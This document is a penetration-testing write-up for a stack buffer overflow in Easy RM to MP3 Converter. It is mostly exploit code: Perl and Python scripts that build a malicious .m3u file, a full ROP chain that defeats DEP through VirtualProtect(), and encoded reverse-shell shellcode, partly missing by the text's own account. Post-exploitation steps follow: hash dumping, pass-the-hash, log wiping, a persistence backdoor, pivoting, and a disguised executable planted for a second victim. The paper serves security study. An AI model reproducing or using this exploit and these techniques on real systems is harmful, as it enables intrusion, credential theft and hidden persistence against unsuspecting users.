Penetration Testing for Easy RM to MP3 Converter Application and Post Exploit
Author:
JongWon Kim
dikien2012@gmail.com
http://dikien2012.blogspot.com
1
Table of Contents
Penetration Testing for Easy RM to MP3 Converter Application ..... 1
Table of Contents ..... 2
Abstract ..... 3
Setting up the Testing Environment ..... 4
Strategy for the Application Testing ..... 5
Dynamic Analysis ..... 6
Strategy for the Post Exploit ..... 15
Post Exploit ..... 16
Conclusion ..... 21
http://dikien2012.blogspot.com
2
Abstract
Advanced persistent threats endanger our valuable assets. New exploits against end-point users and corporations are researched day by day. No matter how well the operating system's protection mechanisms work, privilege escalation can be easy because of a single vulnerable application. Many corporations defend their information with firewalls, WAFs and SLBs, but one vulnerable application can render these powerful protection lines useless. In this paper I analyse such an application and suggest a solution within a Windows environment.
The scenario for this paper is imaginary. My client reports that "Easy RM to MP3 Converter" sometimes exits when opening an .m3u file that contains an overly long string. First, I show that the application has a stack-based buffer overflow vulnerability and build a ROP-based exploit to test it. Second, I attack the machine running the application with the exploit and perform post-exploitation.
Setting up the Testing Environment
BackTrack 5 R1 (attack machine, 192.168.10.10)
Windows SP2 (first victim, for the application penetration test; 192.168.10.5 and 10.10.10.5)
Windows SP3 (second victim, reached by pivoting; 10.10.10.20)
Immunity Debugger 1.83
Easy RM to MP3 Converter 2.7.3.700 (vulnerable application)
Metasploit Framework
Social Engineering Toolkit
ALFTP 5.22
Testing Environment Explanation:
The default DEP (Data Execution Prevention) setting for Windows SP2 is OptIn: only Windows system binaries and programs that explicitly opt in are protected. Before the penetration test I manually changed it to OptOut by setting the '/noexecute=' switch on the line for the operating system in the boot configuration (boot.ini) to OptOut (the valid values are OptIn, OptOut, AlwaysOn and AlwaysOff). Under OptOut all programs, processes and services on the Windows system are protected, except for processes in the exception list. There is no exception list for this test, so the converter runs with DEP enforced.
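As an added illustration (not from the original paper), here is the relevant boot.ini line before and after the change, assuming a default single-boot Windows XP SP2 install; the ARC path and the description string are placeholders that differ per machine.

```ini
[operating systems]
; Before (SP2 default): only Windows system binaries and opted-in programs get DEP
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=OptIn /fastdetect

; After (setting used for this test): every process gets DEP unless it is on the exception list
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=OptOut /fastdetect
```

boot.ini is a hidden, read-only system file and the change only takes effect after a reboot; `wmic OS get DataExecutionPrevention_SupportPolicy` reports the active mode (2 = OptIn, 3 = OptOut), which is worth checking before trusting a DEP-bypass test.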
Strategy for the Application Testing
I use the Windows API function VirtualProtect() to bypass DEP. This function changes the access protection of a region of memory pages, which lets me make the location where my payload resides executable. I have to set up the stack with the correct parameters for that function first. I cannot point the overwritten return address (or an SEH record) directly at my payload, because with DEP in OptOut mode the payload on the stack will not execute.
Below is the prototype of VirtualProtect():
BOOL WINAPI VirtualProtect(
  __in  LPVOID lpAddress,
  __in  SIZE_T dwSize,
  __in  DWORD  flNewProtect,
  __out PDWORD lpflOldProtect
);
Return address: the address VirtualProtect() returns to. It must point at the payload on the stack, so that the now-executable shellcode runs immediately after the call.
lpAddress: a pointer to the starting page of the region whose access protection is to be changed, i.e. the payload.
dwSize: the size of the region whose access protection is to be changed, in bytes.
flNewProtect: the new protection; 0x00000040 is PAGE_EXECUTE_READWRITE.
lpflOldProtect: a pointer to a variable that receives the previous access protection value; any writable address will do.
When control returns into VirtualProtect(), ESP must point at this frame in exactly this order: [return address][lpAddress][dwSize][flNewProtect][lpflOldProtect]. Note that protection is changed with page granularity, so the call affects every page that overlaps lpAddress .. lpAddress+dwSize, not just the bytes of the shellcode.
Dynamic Analysis
First, I calculate the offset between the overwritten registers and the start of the buffer. I write a Perl script that produces a malicious .m3u file, attach the debugger to the application and open the file in it. Below is the script that creates the .m3u file.
==================================================================
use strict;
use warnings;

my $file = "exploit.m3u";
my $junk = "\x41" x 26058;
$junk = $junk . "XXXX";
my $eip = "BBBB";           # This will overwrite EIP
my $nops = "\x90" x 240;
my $shellcode = "";
my $rest = "C" x 300;
my $payload = $junk.$eip.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."\n";
print "Shellcode size : ".length($shellcode)."\n";
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
binmode($FILE);             # write the raw bytes unchanged
print $FILE $payload;
close($FILE);
print "m3u file created successfully\n";
==================================================================
[ Figure 1. EIP is overwritten with BBBB ]
42424242 is the hexadecimal representation of BBBB, so the four bytes that follow the junk land in EIP. Another way to find the exact offset is mona.py: the debugger command '!mona pattern_create 3000' produces a unique, non-repeating pattern, and after the crash the four bytes in EIP identify their position in the buffer. I add this pattern to the script.
==================================================================
use strict;
use warnings;

my $file = "exploit.m3u";
my $junk = "\x41" x 26000;
my $pattern = "";           # paste the output of !mona pattern_create 3000 here
my $nops = "\x90" x 240;
my $shellcode = "";
my $rest = "C" x 300;
my $payload = $junk.$pattern.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."\n";
print "Shellcode size : ".length($shellcode)."\n";
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
binmode($FILE);
print $FILE $payload;
close($FILE);
print "m3u file created successfully\n";
==================================================================
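The offset step can also be done without mona. The following added example (it is not code from the paper) reimplements the Metasploit/mona cyclic pattern (Aa0Aa1Aa2...) in Python, turns the EIP value shown by the debugger back into a buffer offset, and builds the same junk/EIP/NOP/shellcode layout as the Perl scripts above. The crash value 0x37634136 used in the demonstration and the file name are assumptions.

```python
"""Cyclic-pattern offset finding for the .m3u overflow (added example, not the paper's code)."""
import string
import struct


def pattern_create(length):
    """The non-repeating Aa0Aa1Aa2... pattern used by pattern_create (unique below 20280 bytes)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    raise ValueError("a pattern longer than 20280 bytes would repeat")


def eip_to_bytes(eip):
    """The 4 bytes that produced the EIP value shown in the debugger (x86 is little-endian)."""
    return struct.pack("<I", eip)


def pattern_offset(pattern, eip):
    """Offset of the 4 bytes that landed in EIP, or -1 if the value did not come from the pattern.

    `eip` is the crash value as an int (e.g. 0x37634136) or the 4 characters read from the stack.
    """
    needle = eip_to_bytes(eip) if isinstance(eip, int) else eip.encode()
    return pattern.encode().find(needle)


def build_payload(offset, eip=b"BBBB", nop_count=240, shellcode=b"", rest=300):
    """junk + EIP + NOP sled + shellcode + filler, in the same order as the paper's script."""
    return b"\x41" * offset + eip + b"\x90" * nop_count + shellcode + b"C" * rest


def check_payload(payload, offset):
    """Sanity check before writing the file: the 4 bytes at `offset` are what will hit EIP."""
    return payload[offset:offset + 4]


if __name__ == "__main__":
    pat = pattern_create(3000)
    # Assumed crash for the demo: EIP=37634136 is the little-endian view of the bytes "6Ac7".
    off = pattern_offset(pat, 0x37634136)
    print("offset into pattern:", off)
    total = 26000 + off                       # the script above puts 26000 bytes of junk first
    payload = build_payload(total)
    print("bytes at EIP slot:", check_payload(payload, total))
    with open("exploit.m3u", "wb") as fh:     # same file name as the Perl script
        fh.write(payload)
```

A -1 from pattern_offset means the value in EIP was not four consecutive pattern bytes, which usually indicates the crash was not a clean return-address overwrite (a mangled or misaligned value), so the pattern length or the junk prefix should be adjusted before trusting the offset.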
After the crash, '!mona suggest' gives me more useful information. In addition, I check whether the payload arrived in memory intact with '!mona compare -f "C:\Documents and Settings\Administrator\바탕 화면\RM2MP3Converter\pattern.txt"'. I generate gadgets for a ROP chain with '!mona rop -n -cm aslr=false,safeseh=false,rebase=false', which restricts the search to modules that are not ASLR-enabled, not compiled with SafeSEH and not rebased. Once the ROP chain has run, EIP points at the shellcode I want executed. I generated the shellcode with msfpayload and msfencode and added it to the script to build the final exploit .m3u file.
[ Figure 2. Making a payload to connect back to the attacker machine ]
My final exploit is below. It works in two stages:
Stage 1: save the stack pointer in EAX and EDI, and jump over the parameter block.
Stage 2: patch the parameter block in place so that it holds the arguments that make VirtualProtect() mark the shellcode executable, then pivot ESP to the block and return into VirtualProtect().
==================================================================
use strict;
use warnings;

my $file = "exploit.m3u";
my $junk = "\x41" x 26064;
my $eip = pack('V',0x7C84483D);     # RETN from kernel32.dll
my $junk2 = "AAAA";                 # Compensate for
########### Stage-1 starts here ###########
########### Put stack pointer in EDI & EAX ###########
my $rop = pack('V',0x5a489ee7);     # PUSH ESP//MOV EAX,EDX//POP EDI//RETN from uxtheme.dll
$rop = $rop.pack('V',0x77bce842);   # PUSH EDI//POP EAX//POP EBP//RETN from msvcrt.dll
$rop = $rop."AAAA";                 # Compensate for POP EBP
$rop = $rop.pack('V',0x1001653D);   # ADD ESP,20//RETN from MSRMfilter03.dll (jump over the parameters)
########### Parameters for VirtualProtect() ###########
my $parameters = pack('V',0x7C801AD0);      # Address of VirtualProtect()
$parameters = $parameters."WWWW";           # Return address (patched in Stage-2)
$parameters = $parameters."XXXX";           # lpAddress (patched in Stage-2)
$parameters = $parameters."YYYY";           # dwSize (patched in Stage-2)
$parameters = $parameters."ZZZZ";           # flNewProtect (patched in Stage-2)
$parameters = $parameters.pack('V',0x10035005); # lpflOldProtect: writable address
$parameters = $parameters.("H" x 8);        # Padding
########### Stage-1 finished ###########
########### Stage-2 starts here ###########
########### Return address ###########
my $rop2 = pack('V',0x77427175);    # XCHG EDI,ESI//RETN 8
########### Make EAX point at the shellcode ###########
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN from MSRMfilter03.dll
$rop2 = $rop2."AAAA";               # Padding - compensate for RETN 8
$rop2 = $rop2."AAAA";
$rop2 = $rop2."AAAA";               # Padding - compensate for POP EBP
########### Write the return address; afterwards EAX holds the stack pointer ###########
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//POP ESI//RETN
$rop2 = $rop2."AAAA";               # Padding - compensate for POP ESI
########## Save EAX in ESI ##########
$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN
########## Make EAX point at the shellcode again ##########
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA";               # Padding - compensate for POP EBP
########## Increase ESI by 4 (next parameter slot) ##########
$rop2 = $rop2.pack('V',0x5C83F948) x 4; # INC ESI//RETN from comctl32, four times
########## Write lpAddress ##########
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//POP ESI//RETN
$rop2 = $rop2."AAAA";               # Padding - compensate for POP ESI
########## Save EAX in ESI again ##########
$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN
########## dwSize: set EAX to 0x300 ##########
$rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA";               # Padding - compensate for POP EBP
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA";
$rop2 = $rop2.pack('V',0x1002DC4C); # ADD EAX,100//POP EBP//RETN
$rop2 = $rop2."AAAA";
########## Move ESI to the dwSize slot and write it ##########
$rop2 = $rop2.pack('V',0x5C83F948) x 4; # INC ESI//RETN from comctl32, four times
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//POP ESI//RETN
$rop2 = $rop2."AAAA";               # Padding - compensate for POP ESI
########## Save EAX in ESI again ##########
$rop2 = $rop2.pack('V',0x76A602BC); # PUSH EAX//POP ESI//RETN
########## flNewProtect: set EAX to 0x40 (PAGE_EXECUTE_READWRITE) ##########
$rop2 = $rop2.pack('V',0x76A5D8EC); # XOR EAX,EAX//RETN
$rop2 = $rop2.pack('V',0x1002DC41); # ADD EAX,40//POP EBP//RETN
$rop2 = $rop2."AAAA";               # Padding - compensate for POP EBP
$rop2 = $rop2.pack('V',0x5C83F948) x 4; # INC ESI//RETN from comctl32, four times
########## Write flNewProtect ##########
$rop2 = $rop2.pack('V',0x77D944C4); # MOV DWORD PTR DS:[ESI+10],EAX//MOV EAX,ESI//POP ESI//RETN
$rop2 = $rop2."AAAA";               # Padding - compensate for POP ESI
########## Point EAX back at the VirtualProtect() pointer, compensating for the 2 POPs in the pivot gadget ##########
$rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//RETN
$rop2 = $rop2.pack('V',0x76A6028F); # SUB EAX,4//RETN
########## Change ESP and return into VirtualProtect() ##########
$rop2 = $rop2.pack('V',0x73D35CA8); # PUSH EAX//POP ESP//MOV EAX,EDI//POP EDI//POP ESI//RETN from MFC32.dll
my $nops = "\x90" x 240;
# Meterpreter reverse-shell payload generated with msfpayload and msfencode (Figure 2).
# NOTE: the printed listing jumps from page 11 to page 13, so part of the encoded
# shellcode is missing here; regenerate it rather than copying these bytes.
my $shellcode = "\x89\xe0\xd9\xf6\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" .
"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x49\x6c\x49\x78\x6b\x39\x43\x30\x75\x50\x53" .
"\x30\x73\x50\x4e\x69\x4d\x35\x44\x71\x6e\x32\x62\x44\x6c" .
"\x4b\x62\x72\x30\x30\x4c\x4b\x46\x32\x56\x6c\x6e\x6b\x30" .
"\x52\x75\x44\x6e\x6b\x61\x62\x56\x48\x74\x4f\x4d\x67\x42" .
"\x6a\x65\x76\x30\x31\x49\x6f\x66\x51\x79\x50\x6c\x6c\x75" .
"\x70\x61\x7a\x34\x44\x50\x56\x36\x37\x75\x38\x63\x32\x4b" .
"\x69\x69\x58\x73\x6f\x49\x6f\x39\x45\x4e\x6b\x57\x46\x31" .
"\x7a\x47\x30\x33\x58\x55\x50\x44\x50\x47\x70\x73\x30\x32" .
"\x76\x62\x4a\x65\x50\x32\x48\x66\x38\x69\x34\x61\x43\x59" .
"\x75\x69\x6f\x68\x55\x5a\x33\x56\x33\x61\x7a\x55\x50\x61" .
"\x46\x32\x73\x50\x57\x30\x68\x66\x62\x68\x59\x48\x48\x53" .
"\x6f\x6b\x4f\x39\x45\x47\x71\x48\x43\x57\x59\x58\x46\x4e" .
"\x65\x4c\x36\x30\x75\x68\x6c\x6f\x33\x41\x41";
my $rest = "C" x 300;
my $payload = $junk.$eip.$junk2.$rop.$parameters.$rop2.$nops.$shellcode.$rest;
print "Payload size : ".length($payload)."\n";
print "Shellcode size : ".length($shellcode)."\n";
open(my $FILE, ">", $file) or die "Cannot open $file: $!";
binmode($FILE);
print $FILE $payload;
close($FILE);
print "m3u file created successfully\n";
==================================================================
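The chain above is easier to trust once it has been replayed on paper. The following added example (not code from the paper) does that replay for both the strategy section and the final exploit: it rebuilds the same byte layout, executes each gadget according to the semantics given in the listing's comments on a toy x86 stack, and checks what VirtualProtect() would find on the stack when the pivot gadget returns into it. STACK_BASE (the address of the overwritten return-address slot) and the initial register values are assumptions; no real code is executed, so it runs anywhere.

```python
"""Dry-run of the two-stage VirtualProtect ROP chain on a toy stack (added example)."""
import struct

# Gadget addresses from the exploit listing; each comment is the instruction sequence it runs.
RETN = 0x7C84483D         # RETN (kernel32.dll)
G_ESP2EDI = 0x5A489EE7    # PUSH ESP // MOV EAX,EDX // POP EDI // RETN
G_EDI2EAX = 0x77BCE842    # PUSH EDI // POP EAX // POP EBP // RETN
G_ADDESP20 = 0x1001653D   # ADD ESP,20 // RETN
VIRTUALPROTECT = 0x7C801AD0
WRITABLE = 0x10035005     # lpflOldProtect: any writable address
G_XCHG = 0x77427175       # XCHG EDI,ESI // RETN 8
G_ADD100 = 0x1002DC4C     # ADD EAX,100 // POP EBP // RETN
G_MOVESI10 = 0x77D944C4   # MOV [ESI+10],EAX // MOV EAX,ESI // POP ESI // RETN
G_EAX2ESI = 0x76A602BC    # PUSH EAX // POP ESI // RETN
G_INCESI = 0x5C83F948     # INC ESI // RETN
G_XOREAX = 0x76A5D8EC     # XOR EAX,EAX // RETN
G_ADD40 = 0x1002DC41      # ADD EAX,40 // POP EBP // RETN
G_SUB4 = 0x76A6028F       # SUB EAX,4 // RETN
G_PIVOT = 0x73D35CA8      # PUSH EAX // POP ESP // MOV EAX,EDI // POP EDI // POP ESI // RETN

STACK_BASE = 0x000FF000   # assumed address of the EIP slot on the real stack
NOPS = 240
PAD = b"AAAA"


def p(v):
    return struct.pack("<I", v & 0xFFFFFFFF)


def build_chain():
    """$eip.$junk2.$rop.$parameters.$rop2.$nops, in the same order as the Perl script."""
    rop = p(G_ESP2EDI) + p(G_EDI2EAX) + PAD + p(G_ADDESP20)
    params = p(VIRTUALPROTECT) + b"WWWW" + b"XXXX" + b"YYYY" + b"ZZZZ" + p(WRITABLE) + b"H" * 8
    inc4 = p(G_INCESI) * 4
    rop2 = (p(G_XCHG) + p(G_ADD100) + PAD * 3                                # return address
            + p(G_MOVESI10) + PAD + p(G_EAX2ESI) + p(G_ADD100) + PAD + inc4  # lpAddress
            + p(G_MOVESI10) + PAD + p(G_EAX2ESI) + p(G_XOREAX)
            + (p(G_ADD100) + PAD) * 3 + inc4                                 # dwSize = 0x300
            + p(G_MOVESI10) + PAD + p(G_EAX2ESI) + p(G_XOREAX) + p(G_ADD40) + PAD + inc4
            + p(G_MOVESI10) + PAD                                            # flNewProtect = 0x40
            + p(G_SUB4) * 2 + p(G_PIVOT))                                    # ESP -> parameter block
    return p(RETN) + PAD + rop + params + rop2 + b"\x90" * NOPS


class Stack:
    """EAX/EDX/EDI/ESI/EBP, ESP, EIP and the stack bytes: enough state to follow the chain."""
    def __init__(self, chain):
        self.mem, self.eip = bytearray(chain), RETN
        self.r = dict(eax=0, edx=0, edi=0, esi=0, ebp=0)
        self.esp = STACK_BASE + 8   # ESP sits 4 bytes past the EIP slot; $junk2 fills that gap
    def rd(self, a): return struct.unpack_from("<I", self.mem, a - STACK_BASE)[0]
    def wr(self, a, v): struct.pack_into("<I", self.mem, a - STACK_BASE, v & 0xFFFFFFFF)
    def pop(self): v = self.rd(self.esp); self.esp += 4; return v
    def push(self, v): self.esp -= 4; self.wr(self.esp, v)
    def ret(self, n=0): self.eip = self.pop(); self.esp += n


def step(s):
    """Execute the gadget at EIP exactly as its comment in the listing describes it."""
    r, g = s.r, s.eip
    if g == RETN:           s.ret()
    elif g == G_ESP2EDI:    s.push(s.esp); r["eax"] = r["edx"]; r["edi"] = s.pop(); s.ret()
    elif g == G_EDI2EAX:    s.push(r["edi"]); r["eax"] = s.pop(); r["ebp"] = s.pop(); s.ret()
    elif g == G_ADDESP20:   s.esp += 0x20; s.ret()
    elif g == G_XCHG:       r["edi"], r["esi"] = r["esi"], r["edi"]; s.ret(8)
    elif g == G_ADD100:     r["eax"] += 0x100; r["ebp"] = s.pop(); s.ret()
    elif g == G_ADD40:      r["eax"] += 0x40; r["ebp"] = s.pop(); s.ret()
    elif g == G_MOVESI10:   s.wr(r["esi"] + 0x10, r["eax"]); r["eax"] = r["esi"]; r["esi"] = s.pop(); s.ret()
    elif g == G_EAX2ESI:    s.push(r["eax"]); r["esi"] = s.pop(); s.ret()
    elif g == G_INCESI:     r["esi"] += 1; s.ret()
    elif g == G_XOREAX:     r["eax"] = 0; s.ret()
    elif g == G_SUB4:       r["eax"] -= 4; s.ret()
    elif g == G_PIVOT:
        s.push(r["eax"]); s.esp = s.pop(); r["eax"] = r["edi"]; r["edi"] = s.pop(); r["esi"] = s.pop(); s.ret()
    else:
        raise ValueError("EIP left the chain: %#x" % g)


def run_chain():
    """Run gadgets until EIP is VirtualProtect(), then decode the frame ESP points at."""
    chain = build_chain()
    s = Stack(chain)
    for _ in range(200):
        if s.eip == VIRTUALPROTECT:
            break
        step(s)
    else:
        raise RuntimeError("chain never reached VirtualProtect")
    ret, lp, size, prot, oldp = (s.rd(s.esp + 4 * i) for i in range(5))
    nops_start = STACK_BASE + len(chain) - NOPS
    return {"esp": s.esp, "return": ret, "lpAddress": lp, "dwSize": size,
            "flNewProtect": prot, "lpflOldProtect": oldp,
            "lands_in_nops": nops_start <= lp < nops_start + NOPS}


if __name__ == "__main__":
    for k, v in run_chain().items():
        print("%-15s %s" % (k, v if isinstance(v, bool) else hex(v)))
```

The replay shows why the "+0x100" in the ADD EAX gadget is enough: measured from the slot the stack pointer was captured in, the parameter block and stage 2 occupy 0xD8 bytes, so EAX+0x100 lands 40 bytes into the NOP sled, and that value is written both as the return address and as lpAddress. If gadgets or padding are changed, rerun this before touching the real target: a chain that never reaches VirtualProtect() or whose lpAddress misses the sled fails here instead of in the debugger.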
Since the shellcode connects back to the BackTrack machine, I start a multi/handler in msfconsole listening on TCP port 4444.
[ Figure 3. Listening on TCP port 4444 ]
I create the .m3u file with the script above and open it with the application.
[ Figure 4. Opening exploit.m3u to crash the application ]
I get a Meterpreter shell from the first victim machine.
[ Figure 5. Getting the Meterpreter shell from the first victim machine ]
Strategy for the Post Exploit
1. Understanding the Victim better
2. Privilege Escalation
3. Deleting Logs and Killing Monitoring software
4. Collecting Data, and Executing programs
5. Backdoors and Rootkits
6. Using victims as a Pivot to hack deeper into the network
Post Exploit
1. Understanding the Victim better
[ Figure 5. Network Information ]
I dump the password hashes and can crack them with John the Ripper. If I cannot recover the original passwords, I can use the pass-the-hash technique, which requires only the password hash, not the password itself.
[ Figure 6. Password Hashes ]
I can also look for more vulnerable applications, available tokens, and the routing table.
[ Figure 7. Token Lists ]
[ Figure 8. Running applications ]
[ Figure 9. Routing Table ]
I notice this machine is running ALFTP; it will be used in the social-engineering attack later.
[ Figure 10. ALFTP is running ]
2. Privilege Escalation
After obtaining SYSTEM privileges with getsystem (technique 1), I migrate into PID 1072 (svchost.exe) so that the session survives if the converter is closed.
[ Figure 11. Privilege Escalation Success ]
3. Deleting Logs and Killing Monitoring software
I try to kill antivirus software, but none is installed; then I clear the event logs.
[ Figure 12. Killing AV and deleting event logs ]
4. Collecting Data, and Executing programs
[ Figure 13. Collecting txt files ]
5. Backdoors and Rootkits
I run the persistence script and tell Windows to auto-start the agent at boot, retry the connection every 100 seconds, and connect back on port 443 to IP 192.168.10.5.
[ Figure 14. Installing the Backdoor ]
6. Using victims as a Pivot to hack deeper into the network
I find that the first victim machine has two network cards on different subnets; the second subnet is an internal network unreachable from outside. I go inside by routing through the first victim's Meterpreter session as a tunnel.
[ Figure 15. Setting routing table ]
[ Figure 16. Running scan via session 1 ]
I see that the second victim machine (10.10.10.20) has port 139 open, which means it could be vulnerable to MS08-067 (an open SMB port only makes it a candidate; the exploit module's own check would confirm it).
[ Figure 17. Port Scan ]
I create a malicious file with a fake name (alsong.exe) that connects back to the attacker machine with a Meterpreter shell, find the FTP server's working directory on the first victim machine and upload the file there.
[ Figure 18. Uploading the malicious file ]
I check that the malicious file is on the FTP server. The second victim downloads and executes it.
[ Figure 19. Uploading the malicious file ]
A new session is created from the second victim machine.
[ Figure 20. Attack Success on the second victim machine ]
Conclusion
I showed that a single vulnerable application can threaten the internal network. The latest OS protection mechanisms, firewalls and SLBs cannot always protect our assets. It is vital not only that developers practise secure coding to prevent attacks such as buffer overflows and heap sprays, but also that end users are security-conscious: they should not install applications they do not need for work, and they should keep the ones they use updated. Essential databases should be kept completely separate from ordinary staff. As is frequently pointed out, we should keep in mind that an attack can come from inside.